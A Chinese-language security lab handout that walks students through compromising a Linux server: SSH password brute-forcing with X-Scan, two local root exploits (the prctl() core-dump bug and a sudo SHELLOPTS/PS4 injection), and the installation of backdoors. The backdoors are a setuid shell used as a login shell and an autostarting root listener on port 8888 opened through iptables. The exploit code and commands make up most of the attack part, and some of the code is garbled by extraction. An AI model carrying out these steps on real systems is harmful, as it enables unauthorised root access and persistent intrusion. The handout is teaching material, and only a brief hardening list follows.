SEC-L05-001.1
Linux漏洞利用
2010年4月
Linux 漏洞利用
技术背景
Linux 操作系统是一款开源的类UNIX操作系统,有多种发行版(Distributions),如 RedHat Linux、SUSE Linux、Debian Linux等等等等。这些发行版在系统安装、包管理、桌面应用等方面各有特色,但是其操作系统内核(Kernel)均来自于一个组织(www.kernel.org),该组织负责Linux内核的更新、发布。
在部分已发布的内核版本中,存在一些严重影响操作系统安全的漏洞,Hacker 或 Cracker通过利用这些漏洞达到入侵并控制目标主机的目的,Cracker 甚至会通过这些漏洞入侵有问题的主机及该主机所在网络,以达到窃取保密信息、散播蠕虫木马、发起DDOS攻击等目的。
实验目的
通过2种不同漏洞的利用(内核调用漏洞及系统工具漏洞),对普通帐号进行本地提权,通过实际操作增加实验者对网络安全及主机操作系统安全的认识,对希望成为合格的 SA(System Administrator & Security Administrator)的实验者进行系统漏洞类的部分基础知识介绍。
实验平台
攻击机(客户端):Windows2000/XP/2003 目标机(服务端):Linux Server
实验工具
Putty(putty.exe)及 Putty SFTP 工具(psftp.exe) SSH口令在线扫描工具X-Scan
1
演示后门程序 ndoor
实验要点
远程SSH服务在线口令暴力破解 Linux本地提权 简易后门制作
实验步骤指导
实验准备
实验概要:熟悉了解相关的实验工具,掌握Putty,Putty SFTP,X-Scan等工具的使用,操作。
1、下载实验中使用的工具:Putty(putty.exe)及 Putty SFTP 工具(psftp.exe)、SSH口令在线扫描工具X-Scan 、演示后门程序 ndoor
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 【知识重点】
putty.exe 是一个小巧实用的远程登录客户端,支持多种协议。 psftp.exe 是Putty 工具集中的一个支持 SFTP 协议的客户端,用于通
过SFTP协议上传下载文件。
x-scan是一款免费的网络扫描器,我们使用它的在线SSH口令扫描功
能。
ndoor 是用于演示的一个简单后门。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
远程SSH服务口令暴力破解
实验概要:了解使用X-Scan扫描工具,探测被攻击服务器的SSH服务,实现口令自动猜测攻击。 【注释】
2
下载及使用该工具时请关闭杀毒软件或将该工具所在路径设置为排除路径,否则可能会引起杀毒软件的误报(Symantec Antivirus)而删除该工具所需的关键文件。 运行 xscan_gui.exe 启动X-Scan程序; 【知识重点】
X-scan是国内相当出名的扫描工具,X-scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SSL漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。 点击
图标或选择菜单 设置?扫描参数,弹出参数设置窗口,左侧选中检测范
围选项,在右侧的“指定IP范围”下的文本框中输入目标主机IP地址如图1
(图1)
点开左侧的全局设置,进一步设置参数,选中左侧的“扫描模块”, 在右侧仅选中 SSH弱口令,如图2
3
(图2)
为了加快扫描速度,适当增加扫描线程数,点击左侧的“并发扫
描”,在右侧的ListBox中将 ssh 的扫描线程数修改为 30全局设置,如图3
(图3)
点击左侧的“其他设置”,在右侧中仅选中“无条件扫描”, 如图4
4
(图4)
点开左侧的插件设置,选中“端口相关设置”,在右侧的“待检 测端口”下的文本框中输入SSH服务的默认端口号22,如图5
(图5)
选中左侧的“字典文件设置”,双击右侧的“SSH密码字典”及 “SSH用户名字典”,分别设置为 ssh_pass.dic 及 ssh_user.dic,
5
最后点击“确定”关闭参数设置窗口,如图6
(图6) 点击
图标开始扫描,扫描完成后,如图7。
(图7)
扫描完成后会自动打开系统默认浏览器显示扫描结果,在 X-Scan 工具主窗口也可以看到相应结果,在左侧窗口中 “/” 前面是用户名,后面是密码;在“安全漏洞及解决方案”列中,“/” 前面是用户名,后面是密码,图8;
6
(图8)
Linux本地提权1:利用内核调用漏洞(prctl()调用)
实验概要:使用 Putty 工具用普通帐号登录远程系统,利用exploit程序以达到提权目的。 【知识重点】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ Linux Kernel的prctl()调用在处理Core Dump时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
prctl()调用允许未授权进程设置PR_SET_DUMPABLE=2;
因此当发生段错误时产生的core文件将被root用户拥有。本地用户可以创建恶意程序,将core文件dump到正常情况下无权写入的目录中。这可能导致拒绝服务(磁盘耗尽)或获得root权限。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 1.
用第一步获取的账户 tester(对此帐户进行提权) 登录远程主机,如图9所示。
7
(图9) 2.
创建编写提权代码文件,如图10所示。
命令:
[tester@LT-courseware-0007~]$cat > ex.c << _EOF
(图10) 3.
输入提权源代码,如图11所示
代码内容如下所示: #include
8
char
*payload=\n:/usr/bin\\n* * * * * root /bin/cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core.*\\n\int main() { int child;
struct rlimit corelimit;
printf(\ printf(\ printf(\
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf(\ if ( !( child = fork() )) { chdir(\
prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); }
kill(child, SIGSEGV);
printf(\ sleep(62);
printf(\ system(\}
9
(图11)
【知识重点】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 学生通过实验操作了解Linux系统中使用cat命令进行文件编写。
在使用cat命令进行文件编写时,文件内容输入完成后,必须在输入的最后一行后另起新行(敲Enter键),输入cat命令行中最后的重定向符号(<<)后跟随的自定
10
义结束标记以告诉cat程序输入已结束,一般习惯上用包含EOF这三个字符的字符串做结束标记,如图11中定义的结束符为 _EOF。cat 输入过程是行输入模式,即在一行未结束时(未敲Enter键)时,可以编辑修改当前行内容(在大多数shell下都是用delete键从当前光标处向前删除单个字符),一旦新起一行,则上面已输入的行在此次编辑中无法再被更改,因此要谨慎输入。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ cat
使用权限:所有使用者
使用方式:cat [-AbeEnstTuv] [--help] [--version] fileName
说明:把档案串连接后传到基本输出(萤幕或加 > fileName 到另一个档案) 参数:
-n 或 --number 由 1 开始对所有输出的行数编号
-b 或 --number-nonblank 和 -n 相似,只不过对于空白行不编号
-s 或 --squeeze-blank 当遇到有连续两行以上的空白行,就代换为一行的空白行
-v 或 --show-nonprinting 范例:
cat -n textfile1 > textfile2 把 textfile1 的档案内容加上行号后输入 textfile2 这个档案里
cat -b textfile1 textfile2 >> textfile3 把 textfile1 和 textfile2 的档案内容加上行号(空白行不加)之后将内容附加到 textfile3 里。 gcc 参数:
-ansi 只支持 ANSI 标准的 C 语法。这一选项将禁止 GNU C 的某些特色, 例如 asm 或 typeof 关键词。 -c 只编译并生成目标文件。
-DMACRO 以字符串“1”定义 MACRO 宏。
-DMACRO=DEFN 以字符串“DEFN”定义 MACRO 宏。 -E 只运行 C 预编译器。
-g 生成调试信息。GNU 调试器可利用该信息。
11
-IDIRECTORY 指定额外的头文件搜索路径DIRECTORY。 -LDIRECTORY 指定额外的函数库搜索路径DIRECTORY。 -lLIBRARY 连接时搜索指定的函数库LIBRARY。 -m486 针对 486 进行代码优化。
-o FILE 生成指定的输出文件。用在生成可执行文件时。 -O0 不进行优化处理。 -O 或 -O1 优化生成代码。 -O2 进一步优化。
-O3 比 -O2 更进一步优化,包括 inline 函数。 -shared 生成共享目标文件。通常用在建立共享库时。 -static 禁止使用共享连接。 -UMACRO 取消对 MACRO 宏的定义。 -w 不生成任何警告信息。 -Wall 生成所有警告信息。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 【注释】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 图中的 “>” 号是提示符(prompt),不需要输入,代码输入结束后,必须在输入的最后一行后另起新行(敲Enter键),输入cat命令行中最后的重定向符号(<<)后跟随的自定义结束标记以告诉cat程序输入已结束。
图中的代码可以直接复制粘贴到记事本,从记事本中全选 ? 复制,在 Putty 窗口点击鼠标右键即完成粘贴。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 4.
编译提权代码文件,并查看编译后的文件属性,如图12所示
命令:
[tester@LT-courseware-0007~]$gcc -o ex ex.c [tester@LT-courseware-0007~]$ls -al ex
12
(图12) 5.
执行编译后的可执行文件,进行帐户的提权,如图13
命令:
[tester@LT-courseware-0007~]$./ex
(图13) 【注释】
因为该 exploit 利用了系统进程 crond的定时执行特性,因 6.
此执行 ./ex 后需要等60秒,然后将获得一个 root shell
查看当前用权限状态,如图14所示,显示当前的 euid 已经是 0 了。
命令: sh-3.00# id
(图14) 7.
进一步提权,编写新提权文件ex2,如图15所示提权代码内容。
命令:
sh-3.00# cat > ex2.c << _EOF
13
(图15) 编译提权文件ex2; 命令:
sh-3.00# gcc -o ex2 ex2.c -static 执行提权文件ex2, 命令: sh-3.00# ./ex2
查看当前用户状态,如图所示15,可以看到当前的 uid 已经是 0 了,即获得了 root shell 命令: sh-3.00# id 8.
利用内核调用漏洞进行Linux本地用户提权成功,已经在tester帐户环境下获取了root shell(即获得了拥有root权限的shell)。
Linux本地提权2:利用系统工具漏洞(sudo)
实验概要:通过利用系统工具漏洞进行Linux本地帐户提权,以另外的方式再次实现对本地用户提权进行实现。 【知识重点】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
sudo 是一个允许系统管理员授权让普通用户执行部分或全部其他账户(包括root)的应用程序的工具。版本小于 1.6.8p10 的 sudo 存在环境变量的执行漏洞,可被入侵者利用以设置suid,并进一步获取 root shell。
14
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
用第一步获取的账户 test(对此帐户进行提权) 登录远程主机,如图16
(图16)
切换到 c shell,如图17 命令:
[test@LT-courseware-0007~]$csh
(图17)
创建辅助脚本及提权源代码,如图18 命令:(辅助脚本代码如图所示)
15
[test@LT-courseware-0007~]$cat > ex.sh << _EOF 辅助脚本代码如下所示: #! /bin/bash -x echo _EOF
(图18) 【注释】
图中 ”?” 号为提示符(prompt),不需要输入。 命令:
[test@LT-courseware-0007~]$cat > ex.c << _EOF 帐户提权代码如下所示: #include
为辅助脚本ex.sh文件添加执行权限;如图19所示。 命令:
[test@LT-courseware-0007~]$chmod u+x ex.sh
16
编译提权源代码文件; 命令:
[test@LT-courseware-0007~]$gcc -o ex ex.c
查看文件属性,ex.sh 脚本具有了执行权限,ex 可执行程序的属主为 test,组也为test。 命令:
[test@LT-courseware-0007~]$ls -al ex.sh [test@LT-courseware-0007~]$ls -al ex
(图19)
设置环境变量,利用sudo 的漏洞改变 ex 可执行程序的属主和组,同时为其设置suid,我们可以看到, ex 可执行程序的属主改变为 root,组也改变为root,同时设置了s位,如图20 命令:
[test@LT-courseware-0007~]$setenv SHELLOPTS xtrace
[test@LT-courseware-0007~]$setenv PS4 ?$(chown root:root ex;chmod u+s ex)? [test@LT-courseware-0007~]$sudo ./ex.sh
17
(图20) 【注释】
若执行 “sudo ./ex.sh” 后提示输入密码,则输入 test 账户的密码
查看提权文件ex的文件属性,如图20所示,ex 可执行程序的属主改变为 root,组也改变为root,同时设置了s位。 命令:
[test@LT-courseware-0007~]$ls -al ex
执行 ./ex 进行提权,我们可以看到,当前的 uid 已经是 0 了,即获得了 root shell,如图21。 命令:
[test@LT-courseware-0007~]$./ex
18
(图21)
简易后门制作1: 添加/修改帐户,将后门程序作为默认shell
实验概要:一般来说,Hacker或Cracker入侵了目标系统后,为了下次能够顺利进入,都会留下再次进入该系统的后门(backdoor)。后门的种类多种多样。 1.
在刚才获取的 root shell 权限的帐户test中,切换当前目录为/bin,
命令: sh-3.00# cd /bin 2.
创建后门程序,如图22所示。
命令:
sh-3.00# cat >bd.c << _EOF 后门程序代码如下所示: #include
19
} _EOF
(图22) 3.
图中红色框内的内容为创建后门程序,黄色框内的内容为添加一个账户,并设置该账户的home目录为/tmp,登录shell为刚才创建的后门程序,帐户添加成功后用 passwd 命令设置为其密码。 4.
编译后门程序bd.c文件,并将原bd.c文件删除。
命令:
sh-3.00# gcc -o bd bd.c –static sh-3.00# chmod 4755 bd sh-3.00# rm -f bd.c 5.
然后添加账户或修改当前账户,并将该账户的 shell 设置为后门程序以直接获取 root shell, 命令:
sh-3.00# /usr/sbin/useradd -d /tmp -s /bin/bd testbd sh-3.00# passwd testbd 6.
使用新创建的帐户testbd进行登录测试,启动一个新的 Putty 窗口, 输入添加帐户testbd时设置的密码。 7.
登录后输入 id 查看用户权限:root shell,如图23
20
(图23) 8.
已经完成帐户添加/修改简易后门程序制作,使得新添加,修改的帐户直接拥有默认的root shell权限。不需要再通过本地提权方式进行提权后在获得root shell 权限。
简易后门制作2:将后门程序设置为自启动,通过网络登录
实验概要:在目标机器上运行演示后门程序 ndoor ,监听tcp端口 8888,用于以后直接远程端口访问。 1.
保持刚才获取的 root shell 窗口打开(testbd账户登录的窗口);后面需要使用此窗口。 2.
在本机启动putty sftp 服务器端软件工具,上传后门文件(ndoor.bz2),如图24: 命令:
psftp> open 目标主机 IP【需要输入用户名以及密码】 psftp> lcd 切换本地目录到 ndoor.bz2 文件所在路径 psftp> put ndoor.bz2
(图24) 【注释】
21
若连接时弹出证书窗口,则点击yes或者确定接受证书。
lcd 命令后跟的是 ndoor.bz2 文件所在的路径,最好用双引号包含起来。 3.
若本地路径名很长,则可用 putty sftp 工具的粘贴功能(点击窗口左上角图标)。 4.
查看上传ndoor.bz2文件是否已经存在,并退出psftp。
命令: psftp> ls *.bz2 psftp> exit 5. 6.
另起一个 Putty 程序,用普通帐户test登录,
在test用户目录中查看ndoor.bz2文件,并解压缩刚才上传的后门程序,如图25: 命令:
[test@LT-courseware-0007 -]$ls -al ndoor.bz2 [test@LT-courseware-0007 -]$bunzip2 ndoor.bz2
(图25) 7.
切换到 root shell,【使用test帐户登录提权后的putty窗口】修改后门程序的属主、组及权限,并将其移动到系统目录中,切换到ndoor文件的解压目录,如图26所示: 命令:
sh-3.00# cd /home/test sh-3.00# ls -al ndoor
22
(图26)
8. 修改ndoor文件属性: 命令:
sh-3.00# chown root:root ndoor sh-3.00# chmod 755 ndoor sh-3.00# ls -al ndoor
移动ndoor文件到bin目录下面: 命令:
sh-3.00# mv ndoor /bin
【知识重点】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
学生通过实验操作了解Linux系统中文件或者目录的拥有者变更,以及文件或者目录权限的设置。
学生通过实验操作了解Linux系统中文件或者目录的更名、移动。 ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ chown(change owner)
功能说明:变更文件或目录的拥有者或所属群组。
语 法:chown [-cfhRv][--dereference][--help][--version][拥有者.<所属群组>][文件或目录..] 或chown [-chfRv][--dereference][--help][--version][.所属群组][文件或目录... ...] 或chown [-cfhRv][--dereference][--help][--reference=<参考文件或目录>][--version][文件或目录...]
补充说明:在UNIX系统家族里,文件或目录权限的掌控以拥有者及所属群组来
23
管理。您可以使用chown指令去变更文件与目录的拥有者或所属群组,设置方式采用用户名称或用户识别码皆可,设置群组则用群组名称或群组识别码。 参 数:
-c或--changes 效果类似\参数,但仅回报更改的部分。 -f或--quite或--silent 不显示错误信息。
-h或--no-dereference 之对符号连接的文件作修改,而不更动其他任何相关文件。 -R或--recursive 递归处理,将指定目录下所有文件及子目录一并处理。 -v或--version 显示指令执行过程。 --dereference 效果和\参数相同。 --help 在线帮助。
--reference=<参考文件或目录> 把指定文件或目录的拥有者与所属群组全部设成和参考文件或目 录的拥有者与所属群组相同。 --version 显示版本信息。 chmod(change mode)
功能说明:变更文件或目录的权限。
语 法:chmod [-cfRv][--help][--version][<权限范围>+/-/=<权限设置...>][文件或目录...] 或 chmod [-cfRv][--help][--version][数字代号][文件或目
录...] 或 chmod [-cfRv][--help][--reference=<参考文件或目录>][--version][文件或目录...]
补充说明:在UNIX系统家族里,文件或目录权限的控制分别以读取,写入,执行3种一般权限来区分,另有3种特殊权限可供运用,再搭配拥有者与所属群组管理权限范围。您可以使用chmod指令去变更文件与目录的权限,设置方式采用文字或数字代号皆可。符号连接的权限无法变更,如果您对符号连接修改权限,其改变会作用在被连接的原始文件。权限范围的表示法如下: u:User,即文件或目录的拥有者。 g:Group,即文件或目录的所属群组。
o:Other,除了文件或目录拥有者或所属群组之外,其他用户皆属于这个范围。 a:All,即全部的用户,包含拥有者,所属群组以及其他用户。
有关权限代号的部分,列表于下:
24
r:读取权限,数字代号为\。 w:写入权限,数字代号为\。 x:执行或切换权限,数字代号为\。 -:不具任何权限,数字代号为\。
s:特殊?b>功能说明:变更文件或目录的权限。 参 数:
-c或--changes 效果类似\参数,但仅回报更改的部分。 -f或--quiet或--silent 不显示错误信息。
-R或--recursive 递归处理,将指定目录下的所有文件及子目录一并处理。 -v或--verbose 显示指令执行过程。 --help 在线帮助。
--reference=<参考文件或目录> 把指定文件或目录的权限全部设成和参考文件或目录的权限相同 --version 显示版本信息。
<权限范围>+<权限设置> 开启权限范围的文件或目录的该项权限设置。 <权限范围>-<权限设置> 关闭权限范围的文件或目录的该项权限设置。 <权限范围>=<权限设置> 指定权限范围的文件或目录的该项权限设置。 Mv
功能说明:移动或更名现有的文件或目录。
语 法:mv [-bfiuv][--help][--version][-S <附加字尾>][-V <方法>][源文件或目录][目标文件或目录]
补充说明:mv可移动文件或目录,或是更改文件或目录的名称。 参 数:
-b或--backup 若需覆盖文件,则覆盖前先行备份。
-f或--force 若目标文件或目录与现有的文件或目录重复,则直接覆盖现有的文 件或目录。
-i或--interactive 覆盖前先行询问用户。 -S<附加字尾>或
--suffix=<附加字尾> 与-b参数一并使用,可指定备份文件的所要附加的字尾。 -u或--update 在移动或更改文件名时,若目标文件已存在,且其文件日期比源文
25
件新,则不覆盖目标文件。
-v或--verbose 执行时显示详细的信息。 -V=<方法>或
--version-control=<方法> 与-b参数一并使用,可指定备份的方法。 --help 显示帮助。 --version 显示版本信息。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
创建启动脚本,并在 run level 3 及 run level 5 中添加自启动,如图27所示: 命令:
sh-3.00# cat > /etc/init.d/sysbd << _EOF 输入启动脚本内容: case “\\$1” in start)
[ -x /bin/ndoor ] && /bin/ndoor ;; esac
(图27)
【注释】
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
“$1”前的“\\”不能省略。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ 修改创建启动脚本的文件属性: 命令:
26
sh-3.00# chown root:root /etc/init.d/sysbd sh-3.00# chmod u+x /etc/init.d/sysbd
sh-3.00# ln -s /etc/init.d/sysbd /etc/rc.d/rc3.d/S98sysbd sh-3.00# ln -s /etc/init.d/sysbd /etc/rc.d/rc5.d/S98sysbd 用刚才创建的启动脚本启动后门进程,如图28所示: 命令:
sh-3.00# /etc/init.d/sysbd start sh-3.00# netstat -anp | grep ndoor
(图28)
添加iptables规则以打开后门程序的端口,并保存添加的规则,如图29所示: 命令:
sh-3.00# /sbin/iptables -I INPUT -m tcp -p tcp --dport 8888 -j ACCEPT sh-3.00# /etc/init.d/iptables save
(图29) 9.
启动一个新的 Putty 窗口,输入目标主机IP地址,端口填写 8888,协议选择为 Raw,点击 Open 打开新连接,如图30所示:
27
(图30)
10. 连接建立后,出现 [nbd shell] # 提示符,输入 id 可以看到 uid = 0,即这是
一个 root shell;输入 whoami 可以看到是 root;输入 pwd 看到当前工作路径为根,最后输入 exit 或 quit 断开这个连接。如图31所示: 命令: [nbd shell]# id [nbd shell]# whoami [nbd shell]# pwd
(图31)
退出root shell 状态: 命令: [nbd shell]# exit 【知识重点】
28
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※ Whoami
功能说明:显示用户名称。 语 法:whoami [--help][--version]
补充说明:显示自身的用户名称,本指令相当于执行\指令。 参 数: --help 在线帮助。 --version 显示版本信息。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
解决方案
1. 2. 3.
对系统进行加固,配置口令策略以设置强壮密码。 使用iptables限制 SSH 扫描。
使用iptables 限制服务开放的端口,采用“非允许即禁止”策略设置双向 ACL。 4.
对有问题的内核打补丁或升级内核。
29
SEC-L05-001.1-Linux漏洞利用(CVE-2005-2959、CVE-2006-2451)
